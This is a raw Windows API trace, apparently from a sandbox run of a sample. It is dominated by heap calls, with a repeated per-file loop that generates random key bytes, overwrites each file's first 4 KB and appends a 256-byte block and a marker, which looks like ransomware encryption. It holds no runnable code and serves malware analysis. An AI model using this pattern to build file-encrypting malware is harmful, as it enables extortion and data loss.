[0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.637] GetProcessHeap () returned 0x280000 [0078.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.637] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.638] GetProcessHeap () returned 0x280000 [0078.638] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.639] GetProcessHeap () returned 0x280000 [0078.641] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.642] GetProcessHeap () returned 0x280000 [0078.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.642] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.642] WriteFile (in: hFile=0x848, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.642] WriteFile (in: hFile=0x848, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.642] GetProcessHeap () returned 0x280000 [0078.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0078.642] GetProcessHeap () returned 0x280000 [0078.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.642] GetProcessHeap () returned 0x280000 [0078.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.642] CloseHandle (hObject=0x848) returned 1 [0078.643] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 49 [0078.643] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.643] ReadFile (in: hFile=0x84c, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.643] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.644] GetProcessHeap () returned 0x280000 [0078.644] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.644] GetProcessHeap () returned 0x280000 [0078.644] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.644] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.644] GetProcessHeap () returned 0x280000 [0078.644] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.644] ReadFile (in: hFile=0x84c, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.697] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.697] WriteFile (in: hFile=0x84c, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.698] GetProcessHeap () returned 0x280000 [0078.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.699] GetProcessHeap () returned 0x280000 [0078.699] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.699] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.700] GetProcessHeap () returned 0x280000 [0078.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.701] GetProcessHeap () returned 0x280000 [0078.701] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.702] GetProcessHeap () returned 0x280000 [0078.702] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.702] GetProcessHeap () returned 0x280000 [0078.702] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.702] GetProcessHeap () returned 0x280000 [0078.702] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.702] GetProcessHeap () returned 0x280000 [0078.702] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.702] GetProcessHeap () returned 0x280000 [0078.702] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.711] GetProcessHeap () returned 0x280000 [0078.711] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.711] GetProcessHeap () returned 0x280000 [0078.712] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.712] GetProcessHeap () returned 0x280000 [0078.712] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.712] GetProcessHeap () returned 0x280000 [0078.712] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.712] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.712] WriteFile (in: hFile=0x84c, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.712] WriteFile (in: hFile=0x84c, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.712] GetProcessHeap () returned 0x280000 [0078.712] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0078.712] GetProcessHeap () returned 0x280000 [0078.712] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.712] GetProcessHeap () returned 0x280000 [0078.712] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.712] CloseHandle (hObject=0x84c) returned 1 [0078.714] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 50 [0078.714] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.714] ReadFile (in: hFile=0x850, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.714] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.714] GetProcessHeap () returned 0x280000 [0078.714] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.714] GetProcessHeap () returned 0x280000 [0078.714] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.714] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.714] GetProcessHeap () returned 0x280000 [0078.714] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.714] ReadFile (in: hFile=0x850, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.765] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.765] WriteFile (in: hFile=0x850, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.765] GetProcessHeap () returned 0x280000 [0078.765] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.765] GetProcessHeap () returned 0x280000 [0078.765] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.765] GetProcessHeap () returned 0x280000 [0078.765] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0078.765] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap 